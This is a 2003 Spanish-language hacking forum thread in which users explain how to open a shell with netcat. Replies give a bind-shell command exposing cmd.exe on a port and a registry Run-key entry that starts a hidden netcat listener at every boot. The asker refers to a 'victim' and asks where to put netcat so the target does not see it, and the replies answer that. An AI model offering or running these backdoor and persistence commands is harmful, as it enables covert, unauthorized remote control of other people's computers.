elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Shell con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Shell con netcat  (Leído 9,749 veces)
Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Shell con netcat
« en: 25 Octubre 2003, 09:02 »

Hola, cuales serian los comandos que debo typear en el netcat para que me devuelva una shell.

Gracias  :D
« Última modificación: 25 Octubre 2003, 11:15 por Kerber0 » En línea

Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.966


Ver Perfil WWW
Re:Shell con netcat
« Respuesta #1 en: 25 Octubre 2003, 16:47 »

ejecutalo con este comando en tu pc y luego conectate por telnet a este puerto y verás el resultado  :P

nc -l -p 23 -t -e cmd.exe
En línea

Diablo

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Shell con netcat
« Respuesta #2 en: 26 Octubre 2003, 01:50 »

Si escribes ese comando en tu consola, dejas el puerto 23 de tu ordenador escuchando a una conexión, si alguien conecta le dará shell.

Lo que está preguntando, seguramente, es obtener una shell remota con netcat
En línea

Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Re:Shell con netcat
« Respuesta #3 en: 26 Octubre 2003, 02:05 »

Claro, yo hago eso mismo y desde un cyber y no me da ninguna shell. Osea en un ordenador de un cyber coloco esos comandos, conecto desde otro PC pero se queda tildado... Lo probe en 2 diferentes cybers y ninguno resultado. Eso si, en ves de cmd.exe puse command.com porque era win9.

Muchas gracias :D
En línea

Diablo

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Shell con netcat
« Respuesta #4 en: 26 Octubre 2003, 02:19 »

Bien si dejas en otra máquina el netcat escuchando,
puedes conectarte a esa máquina desde otra usando el siguiente comando

nc -v -v -t ip puerto

Puedes en el ordenador objetivo hacer que el netcat arranque cada vez que encendamos windows, añadiendo al registro una línea. En la consola escribes:

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\windows\system3\nc.exe -L -d -e cmd.exe -p 1000"

Esto deja escuchando netcat en el puerto 1000 (válido windows xp y 2000)

Si otro día quieres borrar la entrada del registro

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat

En línea

dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 3.029



Ver Perfil
Re:Shell con netcat
« Respuesta #5 en: 26 Octubre 2003, 03:47 »

Diablo podrias explicar esta parte?

 /v Netcat /t REG_SZ /d

y haciendo eso donde tendria q estar el netcat???

otra cosa el -d es para q no se abra la shell... pero yo lo ice y se me seguia abriendo... tuve q acer una aplicacion en VB pero solo funcionaba en win XP en win2000 no :S...
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
Diablo

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Shell con netcat
« Respuesta #6 en: 26 Octubre 2003, 05:01 »

En la tabla siguiente se indican los tipos de datos definidos y utilizados por el sistema.

REG_BINARY Datos binarios sin procesar. La mayor parte de la información de los componentes de hardware se almacena en forma de datos binarios y se presenta en el Editor del Registro en formato hexadecimal.  
REG_DWORD Datos representados por un número de 4 bytes de longitud. Muchos parámetros de controladores de dispositivo y de servicios son de este tipo, y se presentan en el Editor del Registro en formato binario, hexadecimal o decimal.
REG_EXPAND_SZ Cadena de datos de longitud variable. Este tipo de datos incluye variables que se resuelven cuando un programa o un servicio utiliza los datos.
REG_MULTI_SZ Una cadena múltiple. Los valores que contienen listas o valores múltiples legibles suelen ser de este tipo. Las entradas están separadas mediante espacios, comas u otras marcas.
REG_SZ Cadena de texto de longitud fija.
REG_FULL_RESOURCE_DESCRIPTOR Serie de tablas anidadas, diseñadas para almacenar una lista de recursos para un componente de hardware o un controlador.

EJECUTA CMD /K REG ADD /?

 /v   Nombre del valor en la clave seleccionada para agregar. En este caso la he llamado Netcat

/t REG_SZ Tipo de datos que agregamos, de longitud fija

/d Datos que agregamos  "C:\windows\system3\nc.exe -L -d -e cmd.exe -p 1000"

El netcat deberá estar en la carpeta c:\windows\system32

si es winnt\system32 pues ya sabes

o tb %systemroot%\system32\nc.exe podríamos usar esto

si haces esto con -d agregado al registro de nuestro sistema no se te abre la shell, he probado varias veces y nunca he tenido ese problema.

Saludos




« Última modificación: 26 Octubre 2003, 05:04 por Diablo » En línea

dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 3.029



Ver Perfil
Re:Shell con netcat
« Respuesta #7 en: 26 Octubre 2003, 08:53 »

Grascias. no lo sabia.
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
Kerber0

Desconectado Desconectado

Mensajes: 142

Yo me Amo!


Ver Perfil
Re:Shell con netcat
« Respuesta #8 en: 26 Octubre 2003, 10:08 »

Gracias che, aunque me quedaron un par de dudas:

Supongamos que la victima ejecuta el netcat del escritorio, eso influye en algo ? o siempre hay que ejecutarlo de c:/windows/system32 ?

Es lo mismo que ponga cmd.exe (en maquinas 2k) y command.com (en maquinas 9x) o siempre tengo que poner cmd.exe ?

Bueno, muchas gracias loco ;D
En línea

Diablo

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re:Shell con netcat
« Respuesta #9 en: 27 Octubre 2003, 11:50 »

En fin... la pregunta la puedes responder tu solo.

1º Si el netcat estuviera en el escritorio... no lo vería el objetivo?

2º cmd sólo en windows NT... y en el 98 me command.com


Saludos
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Netcat Archivos Shell
Hacking Básico
Mardorx 4 3,008 Último mensaje 25 Mayo 2011, 01:06
por tragantras
consulta sobre shell y netcat
Nivel Web
pedrosh20 4 2,826 Último mensaje 24 Noviembre 2011, 04:45
por ipwn
Netcat: ayuda .bat que funciona como Shell inversa...
Hacking Avanzado
n0names 6 2,634 Último mensaje 8 Marzo 2012, 21:53
por kub0x
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines